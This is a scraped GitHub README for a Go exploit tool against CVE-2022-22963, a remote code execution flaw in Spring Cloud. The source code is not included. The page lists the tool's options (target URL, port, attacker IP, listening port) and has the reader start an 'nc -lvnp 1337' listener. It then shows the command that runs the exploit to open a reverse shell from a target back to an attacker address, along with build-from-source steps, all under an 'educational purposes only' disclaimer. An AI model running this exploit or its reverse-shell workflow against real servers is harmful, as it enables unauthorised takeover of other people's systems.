CVE-2022-22963

Remote Code Execution exploiting CVE-2022-22963 attacking Spring Cloud service.

Disclamier: This is for educational purposes only. The author is not responsible for the use of this program. Use under your own risk

Usage

./CVE-2022-22963 -h


Usage:
  CVE-2022-22963 [OPTIONS]

Application Options:
  -u, --target-url=     Target/Host url where 'Spring Cloud' is running. Example: -t http://somesite.htb
  -p, --target-port=    Port running the service. Example: -p 8080
  -i, --attacker-ip=    Attacker IPv4 Address. Example: -i 10.10.10.10
  -l, --listening-port= Listening port to connect. Example: -l 1337

Help Options:
  -h, --help            Show this help message

Assume a possible vulnerable target is running at http://somerandomserver.com:8080. Start nc listening on the port 1337, so we run nc -lvnp 1337. Then, run the script/exploit:

./CVE-2022-22963 -u http://somerandomserver.com -p 8080 -i 10.10.10.10 -l 1337

Build from source

If you have go installed in your machine, just do:

git clone https://github.com/GunZF0x/CVE-2022-22963.git
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file

Name		Name	Last commit message	Last commit date
Latest commit History 6 Commits
binaries		binaries
README.md		README.md
go.mod		go.mod
go.sum		go.sum
main.go		main.go

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

binaries

binaries

README.md

README.md

go.mod

go.mod

go.sum

go.sum

main.go

main.go

Repository files navigation

CVE-2022-22963

Usage

Build from source

About

Releases 1

Packages

Languages

gunzf0x/CVE-2022-22963

Folders and files

Latest commit

History

Repository files navigation

CVE-2022-22963

Usage

Build from source

About

Topics

Resources

Stars

Watchers

Forks

Languages